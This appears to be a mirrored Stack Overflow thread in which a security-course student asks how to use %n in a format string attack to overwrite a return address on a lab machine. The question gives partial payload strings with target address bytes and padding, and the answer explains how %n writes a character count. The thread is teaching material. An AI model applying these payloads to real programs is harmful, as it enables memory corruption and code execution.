How to write value into an address in format string attack

c string security format-string
12,635

printf cannot write anywhere without using the %n format specifier. This is the one you're missing. Something like %.987654d%n will write the number 987654 (the number of characters output so far) to an address specified by the second argument, where the first argument is an int. This should be enough to get you started.

Share:
12,635
Admin
Author by

Admin

Updated on June 23, 2022

Comments

  • Admin
    Admin almost 2 years

    I'm taking a security course which needs us to do format string attack on an unix virtual machine. The vulnerability is a format string using command line argument.

    My question is how can I write value into an address in format string (like write shell code address into function return address)?

    For example, I try to write value 987654 into the return address location 0xaabbccdd. I tried some strings like "AAAA_%10$x", and this can lead the program to print AAAA_41414141.

    Then I replace the letters with my address and try to overwrite it.

    \xdd\xcc\xbb\xaa_%10$x_%54321x_%n"

    But it does not work. I see an article says I should use a smaller number in %54321x since there are some chars I already wrote, but I don't know how many chars I've written before %54321x, either.

    note: The environment has an old version of gcc, so it's not necessary to worried about the value is too large. Any suggestions? Thanks.

  • Oliver Charlesworth
    Oliver Charlesworth over 13 years
    sprintf writing to a char buffer on the stack could also be used to do malicious damage...
  • R.. GitHub STOP HELPING ICE
    R.. GitHub STOP HELPING ICE over 13 years
    @Oli: yes but that's not a format string attack, which OP's assignment seems to be about...
  • R.. GitHub STOP HELPING ICE
    R.. GitHub STOP HELPING ICE over 13 years
    I hardly call that a format string vuln, merely an ordinary strcpy buffer overflow. The fact that sprintf is being used instead of strcpy is rather incidental.

Recents

Why Is PNG file with Drop Shadow in Flutter Web App Grainy?
How to troubleshoot crashes detected by Google Play Store for Flutter app
Cupertino DateTime picker interfering with scroll behaviour
Why does awk -F work for most letters, but not for the letter "t"?
Flutter change focus color and icon color but not works
How to print and connect to printer using flutter desktop via usb?
Critical issues have been reported with the following SDK versions: com.google.android.gms:play-services-safetynet:17.0.0
Flutter Dart - get localized country name from country code
navigatorState is null when using pushNamed Navigation onGenerateRoutes of GetMaterialPage
Android Sdk manager not found- Flutter doctor error
Flutter Laravel Push Notification without using any third party like(firebase,onesignal..etc)
How to change the color of ElevatedButton when entering text in TextField

Related

Format strings and using %n to overwrite memory address with specific value
C - The %x format specifier
How can a Format-String vulnerability be exploited?
format string vulnerability - printf
Are there any free implementations of strcpy_s and/or TR24731-1?
Add string to string in C with safe functions
What is a safe way to join strings in C?
String pointer and array of chars in c
A program that prints even and odd characters from a string
Troubling converting string to long long in C